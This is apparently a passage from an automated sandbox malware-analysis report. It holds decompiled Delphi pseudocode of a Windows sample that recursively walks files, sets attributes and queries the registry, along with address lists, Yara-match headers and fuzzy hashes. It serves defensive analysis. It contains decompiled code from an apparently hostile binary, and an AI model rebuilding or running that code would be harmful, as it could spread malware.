				_push(0x40789f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41524, _t100, 3);
				_push(_v41524);
				E004031F4( &_v41528, 9, 0x4091b4);
				_push(_v41528);
				E004049D0(0, _t100,  &_v41536, __edi, __esi);
				E00404ED0(_v41536,  &_v41532);
				_push(_v41532);
				E004032CC();
				_v12 = E00405B24(_v41520, 0x40000103);
				_push(_t137);
				_push(0x407882);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E0040597C(_v8);
				E00405974();
				E00405988(_v8);
				E0040254C( &_v40254, 4,  &_v16);
				E00407080( &_v41488, _v16, 0x3e8);
				E0040598C(_v12);
				E00405974();
				E00405BE8(_v12, E0040597C(_v8) - 0x14400, _v8);
				_pop(_t133);
				 *[fs:eax] = _t133;
				_push(E00407889);
				return E00404520(_v12);
			}

























                                                            0x00407678
                                                            0x00407679
                                                            0x0040767b
                                                            0x00407680
                                                            0x00407680
                                                            0x00407682
                                                            0x00407684
                                                            0x00407684
                                                            0x00407684
                                                            0x00407687
                                                            0x0040768a
                                                            0x0040768b
                                                            0x00407690
                                                            0x00407693
                                                            0x0040769c
                                                            0x004076a7
                                                            0x004076b8
                                                            0x004076c3
                                                            0x004076c4
                                                            0x004076cf
                                                            0x004076da
                                                            0x004076df
                                                            0x004076f5
                                                            0x004076fa
                                                            0x00407710
                                                            0x00407715
                                                            0x00407726
                                                            0x00407731
                                                            0x0040773e
                                                            0x0040774e
                                                            0x00407753
                                                            0x00407754
                                                            0x00407759
                                                            0x0040775c
                                                            0x00407765
                                                            0x0040776a
                                                            0x00407780
                                                            0x00407785
                                                            0x00407793
                                                            0x004077a4
                                                            0x004077a9
                                                            0x004077ba
                                                            0x004077cf
                                                            0x004077d4
                                                            0x004077d5
                                                            0x004077da
                                                            0x004077dd
                                                            0x004077e3
                                                            0x004077f3
                                                            0x00407806
                                                            0x00407819
                                                            0x0040782c
                                                            0x0040783f
                                                            0x0040784c
                                                            0x00407867
                                                            0x0040786e
                                                            0x00407871
                                                            0x00407874
                                                            0x00407881

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                            • Instruction ID: bad4d56910de55197467fd61e6ec6c56c875cf63360af75c5594bc2395637eb8
                                                            • Opcode Fuzzy Hash: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                            • Instruction Fuzzy Hash: 42514170B002199BDF10EB69CC51A9DB7B5EB46308F1084FAA404772D1DA3DAF458E5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004080E4, Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _t26;
				void* _t36;
				void* _t47;
				void* _t48;
				intOrPtr _t71;
				void* _t79;
				void* _t81;
				void* _t86;

				_t86 = __fp0;
				_t81 = __eflags;
				_t76 = __esi;
				_t75 = __edi;
				_t54 = __ebx;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				E00403F14(0x408054);
				_push(_t79);
				_push(0x408220);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe0;
				E00407080(0x4091a8, 0xb, 0xb);
				E00407080(0x4091b4, 9, 9);
				E00407080(0x4091c0, 3, 3);
				E00407080(0x4091dc, 3, 3);
				_t26 =  *0x409210; // 0x40919c
				E00407080(_t26, 0xb, 0xb); // executed
				E004070DC(__ebx, __edi, __esi, _t81); // executed
				E004049D0(0, __ebx,  &_v24, __edi, __esi);
				if(E00404F6C(_v24) > 0xa200) {
					E00407678(_t54, _t75, _t76); // executed
				}
				E00407E90(_t54, _t75, _t76); // executed
				_t60 = 3;
				_t70 = 3;
				E00407080(0x4091c4, 3, 3);
				_t36 = E00404AE8(_t54, _t75, _t76);
				_t83 = _t36;
				if(_t36 != 0) {
					E004049D0(0, _t54,  &_v28, _t75, _t76);
					_push(_v28);
					_t60 = 3;
					E004031F4( &_v32, 3, 0x4091c4);
					_t70 = _v32;
					_pop(_t47);
					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
					_t84 = _t48;
					if(_t48 != 0) {
						_t70 =  &_v36;
						E004049D0(1, _t54,  &_v36, _t75, _t76);
						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
					}
				}
				E004079A0(_t54, _t75, _t76, _t84); // executed
				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x408227);
				return E004030B8( &_v36, 4);
			}















                                                            0x004080e4
                                                            0x004080e4
                                                            0x004080e4
                                                            0x004080e4
                                                            0x004080e4
                                                            0x004080ec
                                                            0x004080ef
                                                            0x004080f2
                                                            0x004080f5
                                                            0x004080fd
                                                            0x00408104
                                                            0x00408105
                                                            0x0040810a
                                                            0x0040810d
                                                            0x0040811f
                                                            0x00408133
                                                            0x00408147
                                                            0x0040815b
                                                            0x00408160
                                                            0x0040816f
                                                            0x00408174
                                                            0x0040817e
                                                            0x00408190
                                                            0x00408192
                                                            0x00408192
                                                            0x00408197
                                                            0x004081a1
                                                            0x004081a6
                                                            0x004081ab
                                                            0x004081b0
                                                            0x004081b5
                                                            0x004081b7
                                                            0x004081be
                                                            0x004081c6
                                                            0x004081cf
                                                            0x004081d4
                                                            0x004081d9
                                                            0x004081dc
                                                            0x004081dd
                                                            0x004081e2
                                                            0x004081e4
                                                            0x004081e6
                                                            0x004081ee
                                                            0x004081f6
                                                            0x004081f6
                                                            0x004081e4
                                                            0x004081fb
                                                            0x00408200
                                                            0x00408207
                                                            0x0040820a
                                                            0x0040820d
                                                            0x0040821f

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFindModule$CloseFirstHandleName
                                                            • String ID:
                                                            • API String ID: 2572062711-0
                                                            • Opcode ID: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                            • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                            • Opcode Fuzzy Hash: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                            • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004074B4, Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t34;
				intOrPtr _t62;
				void* _t71;
				void* _t72;
				void* _t74;
				intOrPtr _t77;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t77);
				_push(0x40758b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				E004031F4( &_v12, 3, 0x4091dc);
				_t49 = E004052AC(_v8, 0, _v12);
				_t71 = E0040532C(_t25) - 1;
				if(_t71 >= 0) {
					_t72 = _t71 + 1;
					_t74 = 0;
					do {
						_t34 = E0040534C(_t49, _t74);
						_t81 = _t34;
						if(_t34 == 0) {
							E00405338(_t49,  &_v28, _t74);
							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
							E004071D0(_v24, _t49, _t72, _t74); // executed
						} else {
							E00405338(_t49,  &_v20, _t74);
							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
						}
						_t74 = _t74 + 1;
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				E00404520(_t49);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00407592);
				return E004030B8( &_v28, 6);
			}















                                                            0x004074b9
                                                            0x004074ba
                                                            0x004074bb
                                                            0x004074bc
                                                            0x004074bd
                                                            0x004074be
                                                            0x004074c2
                                                            0x004074c8
                                                            0x004074cf
                                                            0x004074d0
                                                            0x004074d5
                                                            0x004074d8
                                                            0x004074e8
                                                            0x004074fa
                                                            0x00407505
                                                            0x00407508
                                                            0x0040750a
                                                            0x0040750b
                                                            0x0040750d
                                                            0x00407511
                                                            0x00407516
                                                            0x00407518
                                                            0x0040754a
                                                            0x00407558
                                                            0x00407560
                                                            0x0040751a
                                                            0x00407525
                                                            0x00407533
                                                            0x0040753b
                                                            0x00407540
                                                            0x00407565
                                                            0x00407566
                                                            0x00407566
                                                            0x0040750d
                                                            0x0040756b
                                                            0x00407572
                                                            0x00407575
                                                            0x00407578
                                                            0x0040758a

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                            • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                            • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                            • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404DE0, Relevance: .1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 56%
                                                            			E00404DE0(char __eax, signed int __ebx) {
				void* _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _t45;
				intOrPtr _t55;
				intOrPtr _t64;
				void* _t65;
				void* _t68;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t64);
				_push(0x404e9f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				_t65 = E0040320C(_v8);
				_t49 = __ebx & 0xffffff00 | _t65 > 0x00000000;
				if((__ebx & 0xffffff00 | _t65 > 0x00000000) != 0) {
					E00404DCC(_v8,  &_v12);
					E0040312C( &_v8, _v12);
					if(E0040320C(_v8) >= 3) {
						_t68 = E00404CF8(_v8);
						if(_t68 == 0) {
							E00404EEC( &_v16);
							E00403358(_v16, _v8);
							if(_t68 != 0) {
								E00404EEC( &_v20);
								_t45 = E00404DE0(_v20, _t49); // executed
								if(_t45 == 0 || E00404EB0(_v8) == 0) {
								}
							}
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E00404EA6);
				return E004030B8( &_v20, 4);
			}












                                                            0x00404de5
                                                            0x00404de6
                                                            0x00404de7
                                                            0x00404de8
                                                            0x00404de9
                                                            0x00404dea
                                                            0x00404df0
                                                            0x00404df7
                                                            0x00404df8
                                                            0x00404dfd
                                                            0x00404e00
                                                            0x00404e0b
                                                            0x00404e0d
                                                            0x00404e12
                                                            0x00404e1a
                                                            0x00404e25
                                                            0x00404e35
                                                            0x00404e3f
                                                            0x00404e41
                                                            0x00404e49
                                                            0x00404e54
                                                            0x00404e59
                                                            0x00404e61
                                                            0x00404e69
                                                            0x00404e70
                                                            0x00404e70
                                                            0x00404e70
                                                            0x00404e59
                                                            0x00404e41
                                                            0x00404e35
                                                            0x00404e86
                                                            0x00404e89
                                                            0x00404e8c
                                                            0x00404e9e

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                            • Instruction ID: 1dfd328e9d81c806f2c03a8771cfa584465e3ed9e3942cc4fd01b0b075e0960a
                                                            • Opcode Fuzzy Hash: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                            • Instruction Fuzzy Hash: 712106B4600209EFDF00EFA5C94299EB7B8FF85304B5045BABA04B72D1D778AF04D658
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406E94, Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t20;
				void* _t24;
				intOrPtr _t40;
				void* _t46;

				_push(__ebx);
				_v16 = 0;
				_v20 = 0;
				_push(_t46);
				_push(0x406f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				E00405008( &_v16, 1, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t20);
				E00403214(_t20, _v20);
				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
				if(_t24 != 0) {
					E004057D8(__fp0);
					asm("fcomp dword [0x406f30]");
					asm("fnstsw ax");
					asm("sahf");
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00406F29);
				return E004030B8( &_v20, 2);
			}










                                                            0x00406e9a
                                                            0x00406e9d
                                                            0x00406ea0
                                                            0x00406ea5
                                                            0x00406ea6
                                                            0x00406eab
                                                            0x00406eae
                                                            0x00406eb6
                                                            0x00406ebe
                                                            0x00406ecc
                                                            0x00406ed4
                                                            0x00406ed5
                                                            0x00406eea
                                                            0x00406ef1
                                                            0x00406ef3
                                                            0x00406efb
                                                            0x00406f01
                                                            0x00406f03
                                                            0x00406f04
                                                            0x00406f09
                                                            0x00406f0c
                                                            0x00406f0f
                                                            0x00406f21

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalPathTempTime
                                                            • String ID:
                                                            • API String ID: 2118298429-0
                                                            • Opcode ID: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                            • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                            • Opcode Fuzzy Hash: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                            • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004052AC, Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004052AC(void* __eax, void* __ecx, void* __edx) {
				void* __esi;
				void* _t7;
				intOrPtr _t11;
				void* _t14;

				_t14 = __eax;
				_t11 =  *0x40447c; // 0x404488
				_t7 = E004044F8(_t11, 0);
				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
				return _t7;
			}







                                                            0x004052b4
                                                            0x004052b6
                                                            0x004052c3
                                                            0x004052cc
                                                            0x004052d7

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFind$FirstNext
                                                            • String ID:
                                                            • API String ID: 1690352074-0
                                                            • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                            • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                            • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                            • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402448, Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E00402448(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x409030(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402530(1);
					}
				}
				return _t6;
			}





                                                            0x0040244b
                                                            0x00402462
                                                            0x0040244d
                                                            0x0040244d
                                                            0x00402453
                                                            0x00402457
                                                            0x0040245b
                                                            0x0040245b
                                                            0x00402457
                                                            0x00402467

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                            • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                            • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                            • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406510, Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406510(void* __eax, void* __edx) {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				intOrPtr* _t10;

				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
				return _t3;
			}








                                                            0x00406517
                                                            0x0040651d

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: IconInfo
                                                            • String ID:
                                                            • API String ID: 2096194817-0
                                                            • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                            • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                            • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                            • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0040D815, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000000), ref: 0040C2A5
                                                              • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000001), ref: 0040C2B1
                                                            • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                            • GetVersion.KERNEL32 ref: 0040D88F
                                                            • GetVersion.KERNEL32 ref: 0040D8A0
                                                            • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                              • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                              • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                              • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                            • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                              • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3734044017-0
                                                            • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                            • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                            • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040F0C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 3541575487-438819550
                                                            • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                            • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                            • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                            • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040F0CC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 3541575487-438819550
                                                            • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                            • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                            • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                            • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040EB18, Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                            • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                            • Instruction ID: c0991531ddac9e0079019e73ada339c648f4459b5552238d600e3526c74abf5e
                                                            • Opcode Fuzzy Hash: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                            • Instruction Fuzzy Hash: 24412C30904618DBDB21EBA6C885BDEB7B5EF48308F5045FAA404B7291D73CAE45DE58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040F13F, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                            • Instruction ID: daf054dd685538e10cf0cfb88bdb67cc68ef1b402af78a2ce0ba985ddb15a516
                                                            • Opcode Fuzzy Hash: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
